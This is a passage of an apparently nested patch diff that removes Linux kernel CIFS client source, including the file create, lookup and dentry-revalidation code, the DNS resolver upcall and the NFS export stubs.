+-			 * POSIX open in samba versions 3.3.1 and earlier could
+-			 * incorrectly fail with invalid parameter.
+-			 */
+-			tcon->broken_posix_open = true;
+-			break;
+-
+-		case -EREMOTE:
+-		case -EOPNOTSUPP:
+-			/*
+-			 * EREMOTE indicates DFS junction, which is not handled
+-			 * in posix open.  If either that or op not supported
+-			 * returned, follow the normal lookup.
+-			 */
+-			break;
+-
+-		default:
+-			goto out;
+-		}
+-		/*
+-		 * fallthrough to retry, using older open call, this is case
+-		 * where server does not support this SMB level, and falsely
+-		 * claims capability (also get here for DFS case which should be
+-		 * rare for path not covered on files)
+-		 */
+-	}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-	desired_access = 0;
+-	if (OPEN_FMODE(oflags) & FMODE_READ)
+-		desired_access |= GENERIC_READ; /* is this too little? */
+-	if (OPEN_FMODE(oflags) & FMODE_WRITE)
+-		desired_access |= GENERIC_WRITE;
+-
+-	disposition = FILE_OVERWRITE_IF;
+-	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
+-		disposition = FILE_CREATE;
+-	else if ((oflags & (O_CREAT | O_TRUNC)) == (O_CREAT | O_TRUNC))
+-		disposition = FILE_OVERWRITE_IF;
+-	else if ((oflags & O_CREAT) == O_CREAT)
+-		disposition = FILE_OPEN_IF;
+-	else
+-		cifs_dbg(FYI, "Create flag not set in create function\n");
+-
+-	/*
+-	 * BB add processing to set equivalent of mode - e.g. via CreateX with
+-	 * ACLs
+-	 */
+-
+-	if (!server->ops->open) {
+-		rc = -ENOSYS;
+-		goto out;
+-	}
+-
+-	/*
+-	 * if we're not using unix extensions, see if we need to set
+-	 * ATTR_READONLY on the create call
+-	 */
+-	if (!tcon->unix_ext && (mode & S_IWUGO) == 0)
+-		create_options |= CREATE_OPTION_READONLY;
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = desired_access,
+-		.create_options = cifs_create_options(cifs_sb, create_options),
+-		.disposition = disposition,
+-		.path = full_path,
+-		.fid = fid,
+-		.mode = mode,
+-	};
+-	rc = server->ops->open(xid, &oparms, oplock, buf);
+-	if (rc) {
+-		cifs_dbg(FYI, "cifs_create returned 0x%x\n", rc);
+-		goto out;
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	/*
+-	 * If Open reported that we actually created a file then we now have to
+-	 * set the mode if possible.
+-	 */
+-	if ((tcon->unix_ext) && (*oplock & CIFS_CREATE_ACTION)) {
+-		struct cifs_unix_set_info_args args = {
+-				.mode	= mode,
+-				.ctime	= NO_CHANGE_64,
+-				.atime	= NO_CHANGE_64,
+-				.mtime	= NO_CHANGE_64,
+-				.device	= 0,
+-		};
+-
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-			args.uid = current_fsuid();
+-			if (inode->i_mode & S_ISGID)
+-				args.gid = inode->i_gid;
+-			else
+-				args.gid = current_fsgid();
+-		} else {
+-			args.uid = INVALID_UID; /* no change */
+-			args.gid = INVALID_GID; /* no change */
+-		}
+-		CIFSSMBUnixSetFileInfo(xid, tcon, &args, fid->netfid,
+-				       current->tgid);
+-	} else {
+-		/*
+-		 * BB implement mode setting via Windows security
+-		 * descriptors e.g.
+-		 */
+-		/* CIFSSMBWinSetPerms(xid,tcon,path,mode,-1,-1,nls);*/
+-
+-		/* Could set r/o dos attribute if mode & 0222 == 0 */
+-	}
+-
+-cifs_create_get_file_info:
+-	/* server might mask mode so we have to query for it */
+-	if (tcon->unix_ext)
+-		rc = cifs_get_inode_info_unix(&newinode, full_path, inode->i_sb,
+-					      xid);
+-	else {
+-#else
+-	{
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		/* TODO: Add support for calling POSIX query info here, but passing in fid */
+-		rc = cifs_get_inode_info(&newinode, full_path, buf, inode->i_sb, xid, fid);
+-		if (newinode) {
+-			if (server->ops->set_lease_key)
+-				server->ops->set_lease_key(newinode, fid);
+-			if ((*oplock & CIFS_CREATE_ACTION) && S_ISREG(newinode->i_mode)) {
+-				if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DYNPERM)
+-					newinode->i_mode = mode;
+-				if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
+-					newinode->i_uid = current_fsuid();
+-					if (inode->i_mode & S_ISGID)
+-						newinode->i_gid = inode->i_gid;
+-					else
+-						newinode->i_gid = current_fsgid();
+-				}
+-			}
+-		}
+-	}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-cifs_create_set_dentry:
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	if (rc != 0) {
+-		cifs_dbg(FYI, "Create worked, get_inode_info failed rc = %d\n",
+-			 rc);
+-		goto out_err;
+-	}
+-
+-	if (newinode)
+-		if (S_ISDIR(newinode->i_mode)) {
+-			rc = -EISDIR;
+-			goto out_err;
+-		}
+-
+-	d_drop(direntry);
+-	d_add(direntry, newinode);
+-
+-out:
+-	free_dentry_path(page);
+-	return rc;
+-
+-out_err:
+-	if (server->ops->close)
+-		server->ops->close(xid, tcon, fid);
+-	if (newinode)
+-		iput(newinode);
+-	goto out;
+-}
+-
+-int
+-cifs_atomic_open(struct inode *inode, struct dentry *direntry,
+-		 struct file *file, unsigned oflags, umode_t mode)
+-{
+-	int rc;
+-	unsigned int xid;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifs_fid fid = {};
+-	struct cifs_pending_open open;
+-	__u32 oplock;
+-	struct cifsFileInfo *file_info;
+-	struct cifs_open_info_data buf = {};
+-
+-	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb))))
+-		return -EIO;
+-
+-	/*
+-	 * Posix open is only called (at lookup time) for file create now. For
+-	 * opens (rather than creates), because we do not know if it is a file
+-	 * or directory yet, and current Samba no longer allows us to do posix
+-	 * open on dirs, we could end up wasting an open call on what turns out
+-	 * to be a dir. For file opens, we wait to call posix open till
+-	 * cifs_open.  It could be added to atomic_open in the future but the
+-	 * performance tradeoff of the extra network request when EISDIR or
+-	 * EACCES is returned would have to be weighed against the 50% reduction
+-	 * in network traffic in the other paths.
+-	 */
+-	if (!(oflags & O_CREAT)) {
+-		struct dentry *res;
+-
+-		/*
+-		 * Check for hashed negative dentry. We have already revalidated
+-		 * the dentry and it is fine. No need to perform another lookup.
+-		 */
+-		if (!d_in_lookup(direntry))
+-			return -ENOENT;
+-
+-		res = cifs_lookup(inode, direntry, 0);
+-		if (IS_ERR(res))
+-			return PTR_ERR(res);
+-
+-		return finish_no_open(file, res);
+-	}
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
+-		 inode, direntry, direntry);
+-
+-	tlink = cifs_sb_tlink(CIFS_SB(inode->i_sb));
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		goto out_free_xid;
+-	}
+-
+-	tcon = tlink_tcon(tlink);
+-
+-	rc = check_name(direntry, tcon);
+-	if (rc)
+-		goto out;
+-
+-	server = tcon->ses->server;
+-
+-	if (server->ops->new_lease_key)
+-		server->ops->new_lease_key(&fid);
+-
+-	cifs_add_pending_open(&fid, tlink, &open);
+-
+-	rc = cifs_do_create(inode, direntry, xid, tlink, oflags, mode,
+-			    &oplock, &fid, &buf);
+-	if (rc) {
+-		cifs_del_pending_open(&open);
+-		goto out;
+-	}
+-
+-	if ((oflags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
+-		file->f_mode |= FMODE_CREATED;
+-
+-	rc = finish_open(file, direntry, generic_file_open);
+-	if (rc) {
+-		if (server->ops->close)
+-			server->ops->close(xid, tcon, &fid);
+-		cifs_del_pending_open(&open);
+-		goto out;
+-	}
+-
+-	if (file->f_flags & O_DIRECT &&
+-	    CIFS_SB(inode->i_sb)->mnt_cifs_flags & CIFS_MOUNT_STRICT_IO) {
+-		if (CIFS_SB(inode->i_sb)->mnt_cifs_flags & CIFS_MOUNT_NO_BRL)
+-			file->f_op = &cifs_file_direct_nobrl_ops;
+-		else
+-			file->f_op = &cifs_file_direct_ops;
+-		}
+-
+-	file_info = cifs_new_fileinfo(&fid, file, tlink, oplock, buf.symlink_target);
+-	if (file_info == NULL) {
+-		if (server->ops->close)
+-			server->ops->close(xid, tcon, &fid);
+-		cifs_del_pending_open(&open);
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	fscache_use_cookie(cifs_inode_cookie(file_inode(file)),
+-			   file->f_mode & FMODE_WRITE);
+-
+-out:
+-	cifs_put_tlink(tlink);
+-out_free_xid:
+-	free_xid(xid);
+-	cifs_free_open_info(&buf);
+-	return rc;
+-}
+-
+-int cifs_create(struct user_namespace *mnt_userns, struct inode *inode,
+-		struct dentry *direntry, umode_t mode, bool excl)
+-{
+-	int rc;
+-	unsigned int xid = get_xid();
+-	/*
+-	 * BB below access is probably too much for mknod to request
+-	 *    but we have to do query and setpathinfo so requesting
+-	 *    less could fail (unless we want to request getatr and setatr
+-	 *    permissions (only).  At least for POSIX we do not have to
+-	 *    request so much.
+-	 */
+-	unsigned oflags = O_EXCL | O_CREAT | O_RDWR;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	struct cifs_fid fid;
+-	__u32 oplock;
+-	struct cifs_open_info_data buf = {};
+-
+-	cifs_dbg(FYI, "cifs_create parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
+-		 inode, direntry, direntry);
+-
+-	if (unlikely(cifs_forced_shutdown(CIFS_SB(inode->i_sb)))) {
+-		rc = -EIO;
+-		goto out_free_xid;
+-	}
+-
+-	tlink = cifs_sb_tlink(CIFS_SB(inode->i_sb));
+-	rc = PTR_ERR(tlink);
+-	if (IS_ERR(tlink))
+-		goto out_free_xid;
+-
+-	tcon = tlink_tcon(tlink);
+-	server = tcon->ses->server;
+-
+-	if (server->ops->new_lease_key)
+-		server->ops->new_lease_key(&fid);
+-
+-	rc = cifs_do_create(inode, direntry, xid, tlink, oflags, mode, &oplock, &fid, &buf);
+-	if (!rc && server->ops->close)
+-		server->ops->close(xid, tcon, &fid);
+-
+-	cifs_free_open_info(&buf);
+-	cifs_put_tlink(tlink);
+-out_free_xid:
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_mknod(struct user_namespace *mnt_userns, struct inode *inode,
+-	       struct dentry *direntry, umode_t mode, dev_t device_number)
+-{
+-	int rc = -EPERM;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *tcon;
+-	const char *full_path;
+-	void *page;
+-
+-	if (!old_valid_dev(device_number))
+-		return -EINVAL;
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-
+-	page = alloc_dentry_path();
+-	tcon = tlink_tcon(tlink);
+-	xid = get_xid();
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto mknod_out;
+-	}
+-
+-	rc = tcon->ses->server->ops->make_node(xid, inode, direntry, tcon,
+-					       full_path, mode,
+-					       device_number);
+-
+-mknod_out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-struct dentry *
+-cifs_lookup(struct inode *parent_dir_inode, struct dentry *direntry,
+-	    unsigned int flags)
+-{
+-	unsigned int xid;
+-	int rc = 0; /* to get around spurious gcc warning, set to zero here */
+-	struct cifs_sb_info *cifs_sb;
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	struct inode *newInode = NULL;
+-	const char *full_path;
+-	void *page;
+-	int retry_count = 0;
+-
+-	xid = get_xid();
+-
+-	cifs_dbg(FYI, "parent inode = 0x%p name is: %pd and dentry = 0x%p\n",
+-		 parent_dir_inode, direntry, direntry);
+-
+-	/* check whether path exists */
+-
+-	cifs_sb = CIFS_SB(parent_dir_inode->i_sb);
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		free_xid(xid);
+-		return ERR_CAST(tlink);
+-	}
+-	pTcon = tlink_tcon(tlink);
+-
+-	rc = check_name(direntry, pTcon);
+-	if (unlikely(rc)) {
+-		cifs_put_tlink(tlink);
+-		free_xid(xid);
+-		return ERR_PTR(rc);
+-	}
+-
+-	/* can not grab the rename sem here since it would
+-	deadlock in the cases (beginning of sys_rename itself)
+-	in which we already have the sb rename sem */
+-	page = alloc_dentry_path();
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		cifs_put_tlink(tlink);
+-		free_xid(xid);
+-		free_dentry_path(page);
+-		return ERR_CAST(full_path);
+-	}
+-
+-	if (d_really_is_positive(direntry)) {
+-		cifs_dbg(FYI, "non-NULL inode in lookup\n");
+-	} else {
+-		cifs_dbg(FYI, "NULL inode in lookup\n");
+-	}
+-	cifs_dbg(FYI, "Full path: %s inode = 0x%p\n",
+-		 full_path, d_inode(direntry));
+-
+-again:
+-	if (pTcon->posix_extensions)
+-		rc = smb311_posix_get_inode_info(&newInode, full_path, parent_dir_inode->i_sb, xid);
+-	else if (pTcon->unix_ext) {
+-		rc = cifs_get_inode_info_unix(&newInode, full_path,
+-					      parent_dir_inode->i_sb, xid);
+-	} else {
+-		rc = cifs_get_inode_info(&newInode, full_path, NULL,
+-				parent_dir_inode->i_sb, xid, NULL);
+-	}
+-
+-	if (rc == 0) {
+-		/* since paths are not looked up by component - the parent
+-		   directories are presumed to be good here */
+-		renew_parental_timestamps(direntry);
+-	} else if (rc == -EAGAIN && retry_count++ < 10) {
+-		goto again;
+-	} else if (rc == -ENOENT) {
+-		cifs_set_time(direntry, jiffies);
+-		newInode = NULL;
+-	} else {
+-		if (rc != -EACCES) {
+-			cifs_dbg(FYI, "Unexpected lookup error %d\n", rc);
+-			/* We special case check for Access Denied - since that
+-			is a common return code */
+-		}
+-		newInode = ERR_PTR(rc);
+-	}
+-	free_dentry_path(page);
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-	return d_splice_alias(newInode, direntry);
+-}
+-
+-static int
+-cifs_d_revalidate(struct dentry *direntry, unsigned int flags)
+-{
+-	struct inode *inode;
+-	int rc;
+-
+-	if (flags & LOOKUP_RCU)
+-		return -ECHILD;
+-
+-	if (d_really_is_positive(direntry)) {
+-		inode = d_inode(direntry);
+-		if ((flags & LOOKUP_REVAL) && !CIFS_CACHE_READ(CIFS_I(inode)))
+-			CIFS_I(inode)->time = 0; /* force reval */
+-
+-		rc = cifs_revalidate_dentry(direntry);
+-		if (rc) {
+-			cifs_dbg(FYI, "cifs_revalidate_dentry failed with rc=%d", rc);
+-			switch (rc) {
+-			case -ENOENT:
+-			case -ESTALE:
+-				/*
+-				 * Those errors mean the dentry is invalid
+-				 * (file was deleted or recreated)
+-				 */
+-				return 0;
+-			default:
+-				/*
+-				 * Otherwise some unexpected error happened
+-				 * report it as-is to VFS layer
+-				 */
+-				return rc;
+-			}
+-		}
+-		else {
+-			/*
+-			 * If the inode wasn't known to be a dfs entry when
+-			 * the dentry was instantiated, such as when created
+-			 * via ->readdir(), it needs to be set now since the
+-			 * attributes will have been updated by
+-			 * cifs_revalidate_dentry().
+-			 */
+-			if (IS_AUTOMOUNT(inode) &&
+-			   !(direntry->d_flags & DCACHE_NEED_AUTOMOUNT)) {
+-				spin_lock(&direntry->d_lock);
+-				direntry->d_flags |= DCACHE_NEED_AUTOMOUNT;
+-				spin_unlock(&direntry->d_lock);
+-			}
+-
+-			return 1;
+-		}
+-	}
+-
+-	/*
+-	 * This may be nfsd (or something), anyway, we can't see the
+-	 * intent of this. So, since this can be for creation, drop it.
+-	 */
+-	if (!flags)
+-		return 0;
+-
+-	/*
+-	 * Drop the negative dentry, in order to make sure to use the
+-	 * case sensitive name which is specified by user if this is
+-	 * for creation.
+-	 */
+-	if (flags & (LOOKUP_CREATE | LOOKUP_RENAME_TARGET))
+-		return 0;
+-
+-	if (time_after(jiffies, cifs_get_time(direntry) + HZ) || !lookupCacheEnabled)
+-		return 0;
+-
+-	return 1;
+-}
+-
+-/* static int cifs_d_delete(struct dentry *direntry)
+-{
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "In cifs d_delete, name = %pd\n", direntry);
+-
+-	return rc;
+-}     */
+-
+-const struct dentry_operations cifs_dentry_ops = {
+-	.d_revalidate = cifs_d_revalidate,
+-	.d_automount = cifs_dfs_d_automount,
+-/* d_delete:       cifs_d_delete,      */ /* not needed except for debugging */
+-};
+-
+-static int cifs_ci_hash(const struct dentry *dentry, struct qstr *q)
+-{
+-	struct nls_table *codepage = CIFS_SB(dentry->d_sb)->local_nls;
+-	unsigned long hash;
+-	wchar_t c;
+-	int i, charlen;
+-
+-	hash = init_name_hash(dentry);
+-	for (i = 0; i < q->len; i += charlen) {
+-		charlen = codepage->char2uni(&q->name[i], q->len - i, &c);
+-		/* error out if we can't convert the character */
+-		if (unlikely(charlen < 0))
+-			return charlen;
+-		hash = partial_name_hash(cifs_toupper(c), hash);
+-	}
+-	q->hash = end_name_hash(hash);
+-
+-	return 0;
+-}
+-
+-static int cifs_ci_compare(const struct dentry *dentry,
+-		unsigned int len, const char *str, const struct qstr *name)
+-{
+-	struct nls_table *codepage = CIFS_SB(dentry->d_sb)->local_nls;
+-	wchar_t c1, c2;
+-	int i, l1, l2;
+-
+-	/*
+-	 * We make the assumption here that uppercase characters in the local
+-	 * codepage are always the same length as their lowercase counterparts.
+-	 *
+-	 * If that's ever not the case, then this will fail to match it.
+-	 */
+-	if (name->len != len)
+-		return 1;
+-
+-	for (i = 0; i < len; i += l1) {
+-		/* Convert characters in both strings to UTF-16. */
+-		l1 = codepage->char2uni(&str[i], len - i, &c1);
+-		l2 = codepage->char2uni(&name->name[i], name->len - i, &c2);
+-
+-		/*
+-		 * If we can't convert either character, just declare it to
+-		 * be 1 byte long and compare the original byte.
+-		 */
+-		if (unlikely(l1 < 0 && l2 < 0)) {
+-			if (str[i] != name->name[i])
+-				return 1;
+-			l1 = 1;
+-			continue;
+-		}
+-
+-		/*
+-		 * Here, we again ass|u|me that upper/lowercase versions of
+-		 * a character are the same length in the local NLS.
+-		 */
+-		if (l1 != l2)
+-			return 1;
+-
+-		/* Now compare uppercase versions of these characters */
+-		if (cifs_toupper(c1) != cifs_toupper(c2))
+-			return 1;
+-	}
+-
+-	return 0;
+-}
+-
+-const struct dentry_operations cifs_ci_dentry_ops = {
+-	.d_revalidate = cifs_d_revalidate,
+-	.d_hash = cifs_ci_hash,
+-	.d_compare = cifs_ci_compare,
+-	.d_automount = cifs_dfs_d_automount,
+-};
+diff --git a/fs/cifs/dns_resolve.c b/fs/cifs/dns_resolve.c
+deleted file mode 100644
+index 0458d28d71aa6..0000000000000
+--- a/fs/cifs/dns_resolve.c
++++ /dev/null
+@@ -1,89 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (c) 2007 Igor Mammedov
+- *   Author(s): Igor Mammedov (niallain@gmail.com)
+- *              Steve French (sfrench@us.ibm.com)
+- *              Wang Lei (wang840925@gmail.com)
+- *		David Howells (dhowells@redhat.com)
+- *
+- *   Contains the CIFS DFS upcall routines used for hostname to
+- *   IP address translation.
+- *
+- */
+-
+-#include <linux/slab.h>
+-#include <linux/dns_resolver.h>
+-#include "dns_resolve.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-
+-/**
+- * dns_resolve_server_name_to_ip - Resolve UNC server name to ip address.
+- * @unc: UNC path specifying the server (with '/' as delimiter)
+- * @ip_addr: Where to return the IP address.
+- * @expiry: Where to return the expiry time for the dns record.
+- *
+- * The IP address will be returned in string form, and the caller is
+- * responsible for freeing it.
+- *
+- * Returns length of result on success, -ve on error.
+- */
+-int
+-dns_resolve_server_name_to_ip(const char *unc, char **ip_addr, time64_t *expiry)
+-{
+-	struct sockaddr_storage ss;
+-	const char *hostname, *sep;
+-	char *name;
+-	int len, rc;
+-
+-	if (!ip_addr || !unc)
+-		return -EINVAL;
+-
+-	len = strlen(unc);
+-	if (len < 3) {
+-		cifs_dbg(FYI, "%s: unc is too short: %s\n", __func__, unc);
+-		return -EINVAL;
+-	}
+-
+-	/* Discount leading slashes for cifs */
+-	len -= 2;
+-	hostname = unc + 2;
+-
+-	/* Search for server name delimiter */
+-	sep = memchr(hostname, '/', len);
+-	if (sep)
+-		len = sep - hostname;
+-	else
+-		cifs_dbg(FYI, "%s: probably server name is whole unc: %s\n",
+-			 __func__, unc);
+-
+-	/* Try to interpret hostname as an IPv4 or IPv6 address */
+-	rc = cifs_convert_address((struct sockaddr *)&ss, hostname, len);
+-	if (rc > 0)
+-		goto name_is_IP_address;
+-
+-	/* Perform the upcall */
+-	rc = dns_query(current->nsproxy->net_ns, NULL, hostname, len,
+-		       NULL, ip_addr, expiry, false);
+-	if (rc < 0)
+-		cifs_dbg(FYI, "%s: unable to resolve: %*.*s\n",
+-			 __func__, len, len, hostname);
+-	else
+-		cifs_dbg(FYI, "%s: resolved: %*.*s to %s expiry %llu\n",
+-			 __func__, len, len, hostname, *ip_addr,
+-			 expiry ? (*expiry) : 0);
+-	return rc;
+-
+-name_is_IP_address:
+-	name = kmalloc(len + 1, GFP_KERNEL);
+-	if (!name)
+-		return -ENOMEM;
+-	memcpy(name, hostname, len);
+-	name[len] = 0;
+-	cifs_dbg(FYI, "%s: unc is IP, skipping dns upcall: %s\n",
+-		 __func__, name);
+-	*ip_addr = name;
+-	return 0;
+-}
+diff --git a/fs/cifs/dns_resolve.h b/fs/cifs/dns_resolve.h
+deleted file mode 100644
+index afc0df381246b..0000000000000
+--- a/fs/cifs/dns_resolve.h
++++ /dev/null
+@@ -1,18 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *   DNS Resolver upcall management for CIFS DFS
+- *   Handles host name to IP address resolution
+- *
+- *   Copyright (c) International Business Machines  Corp., 2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#ifndef _DNS_RESOLVE_H
+-#define _DNS_RESOLVE_H
+-
+-#ifdef __KERNEL__
+-extern int dns_resolve_server_name_to_ip(const char *unc, char **ip_addr, time64_t *expiry);
+-#endif /* KERNEL */
+-
+-#endif /* _DNS_RESOLVE_H */
+diff --git a/fs/cifs/export.c b/fs/cifs/export.c
+deleted file mode 100644
+index 37c28415df1e0..0000000000000
+--- a/fs/cifs/export.c
++++ /dev/null
+@@ -1,54 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Common Internet FileSystem (CIFS) client
+- *
+- *   Operations related to support for exporting files via NFSD
+- *
+- */
+-
+- /*
+-  * See Documentation/filesystems/nfs/exporting.rst
+-  * and examples in fs/exportfs
+-  *
+-  * Since cifs is a network file system, an "fsid" must be included for
+-  * any nfs exports file entries which refer to cifs paths.  In addition
+-  * the cifs mount must be mounted with the "serverino" option (ie use stable
+-  * server inode numbers instead of locally generated temporary ones).
+-  * Although cifs inodes do not use generation numbers (have generation number
+-  * of zero) - the inode number alone should be good enough for simple cases
+-  * in which users want to export cifs shares with NFS. The decode and encode
+-  * could be improved by using a new routine which expects 64 bit inode numbers
+-  * instead of the default 32 bit routines in fs/exportfs
+-  *
+-  */
+-
+-#include <linux/fs.h>
+-#include <linux/exportfs.h>
+-#include "cifsglob.h"
+-#include "cifs_debug.h"
+-#include "cifsfs.h"
+-
+-#ifdef CONFIG_CIFS_NFSD_EXPORT
+-static struct dentry *cifs_get_parent(struct dentry *dentry)
+-{
+-	/* BB need to add code here eventually to enable export via NFSD */
+-	cifs_dbg(FYI, "get parent for %p\n", dentry);
+-	return ERR_PTR(-EACCES);
+-}
+-
+-const struct export_operations cifs_export_ops = {
+-	.get_parent = cifs_get_parent,
+-/*	Following five export operations are unneeded so far and can default:
+-	.get_dentry =
+-	.get_name =
+-	.find_exported_dentry =
+-	.decode_fh =
+-	.encode_fs =  */
+-};
+-
+-#endif /* CONFIG_CIFS_NFSD_EXPORT */
+-
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+deleted file mode 100644
+index 87dcffece7623..0000000000000
+--- a/fs/cifs/file.c
++++ /dev/null
+@@ -1,5290 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   vfs operations that deal with files
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2010
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Jeremy Allison (jra@samba.org)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/backing-dev.h>
+-#include <linux/stat.h>
+-#include <linux/fcntl.h>
+-#include <linux/pagemap.h>
+-#include <linux/pagevec.h>
+-#include <linux/writeback.h>
+-#include <linux/task_io_accounting_ops.h>
+-#include <linux/delay.h>
+-#include <linux/mount.h>
+-#include <linux/slab.h>
+-#include <linux/swap.h>
+-#include <linux/mm.h>
+-#include <asm/div64.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "fscache.h"
+-#include "smbdirect.h"
+-#include "fs_context.h"
+-#include "cifs_ioctl.h"
+-#include "cached_dir.h"
+-
+-/*
+- * Mark as invalid, all open files on tree connections since they
+- * were closed when session to server was lost.
+- */
+-void
+-cifs_mark_open_files_invalid(struct cifs_tcon *tcon)
+-{
+-	struct cifsFileInfo *open_file = NULL;
+-	struct list_head *tmp;
+-	struct list_head *tmp1;
+-
+-	/* only send once per connect */
+-	spin_lock(&tcon->ses->ses_lock);
+-	if ((tcon->ses->ses_status != SES_GOOD) || (tcon->status != TID_NEED_RECON)) {
+-		spin_unlock(&tcon->ses->ses_lock);
+-		return;
+-	}
+-	tcon->status = TID_IN_FILES_INVALIDATE;
+-	spin_unlock(&tcon->ses->ses_lock);
+-
+-	/* list all files open on tree connection and mark them invalid */
+-	spin_lock(&tcon->open_file_lock);
+-	list_for_each_safe(tmp, tmp1, &tcon->openFileList) {
+-		open_file = list_entry(tmp, struct cifsFileInfo, tlist);
+-		open_file->invalidHandle = true;
+-		open_file->oplock_break_cancelled = true;
+-	}
+-	spin_unlock(&tcon->open_file_lock);
+-
+-	invalidate_all_cached_dirs(tcon);
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->status == TID_IN_FILES_INVALIDATE)
+-		tcon->status = TID_NEED_TCON;
+-	spin_unlock(&tcon->tc_lock);
+-
+-	/*
+-	 * BB Add call to invalidate_inodes(sb) for all superblocks mounted
+-	 * to this tcon.
+-	 */
+-}
+-
+-static inline int cifs_convert_flags(unsigned int flags)
+-{
+-	if ((flags & O_ACCMODE) == O_RDONLY)
+-		return GENERIC_READ;
+-	else if ((flags & O_ACCMODE) == O_WRONLY)
+-		return GENERIC_WRITE;
+-	else if ((flags & O_ACCMODE) == O_RDWR) {
+-		/* GENERIC_ALL is too much permission to request
+-		   can cause unnecessary access denied on create */
+-		/* return GENERIC_ALL; */
+-		return (GENERIC_READ | GENERIC_WRITE);
+-	}
+-
+-	return (READ_CONTROL | FILE_WRITE_ATTRIBUTES | FILE_READ_ATTRIBUTES |
+-		FILE_WRITE_EA | FILE_APPEND_DATA | FILE_WRITE_DATA |
+-		FILE_READ_DATA);
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static u32 cifs_posix_convert_flags(unsigned int flags)
+-{
+-	u32 posix_flags = 0;
+-
+-	if ((flags & O_ACCMODE) == O_RDONLY)
+-		posix_flags = SMB_O_RDONLY;
+-	else if ((flags & O_ACCMODE) == O_WRONLY)
+-		posix_flags = SMB_O_WRONLY;
+-	else if ((flags & O_ACCMODE) == O_RDWR)
+-		posix_flags = SMB_O_RDWR;
+-
+-	if (flags & O_CREAT) {
+-		posix_flags |= SMB_O_CREAT;
+-		if (flags & O_EXCL)
+-			posix_flags |= SMB_O_EXCL;
+-	} else if (flags & O_EXCL)
+-		cifs_dbg(FYI, "Application %s pid %d has incorrectly set O_EXCL flag but not O_CREAT on file open. Ignoring O_EXCL\n",
+-			 current->comm, current->tgid);
+-
+-	if (flags & O_TRUNC)
+-		posix_flags |= SMB_O_TRUNC;
+-	/* be safe and imply O_SYNC for O_DSYNC */
+-	if (flags & O_DSYNC)
+-		posix_flags |= SMB_O_SYNC;
+-	if (flags & O_DIRECTORY)
+-		posix_flags |= SMB_O_DIRECTORY;
+-	if (flags & O_NOFOLLOW)
+-		posix_flags |= SMB_O_NOFOLLOW;
+-	if (flags & O_DIRECT)
+-		posix_flags |= SMB_O_DIRECT;
+-
+-	return posix_flags;
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static inline int cifs_get_disposition(unsigned int flags)
+-{
+-	if ((flags & (O_CREAT | O_EXCL)) == (O_CREAT | O_EXCL))
+-		return FILE_CREATE;
+-	else if ((flags & (O_CREAT | O_TRUNC)) == (O_CREAT | O_TRUNC))
+-		return FILE_OVERWRITE_IF;
+-	else if ((flags & O_CREAT) == O_CREAT)
+-		return FILE_OPEN_IF;
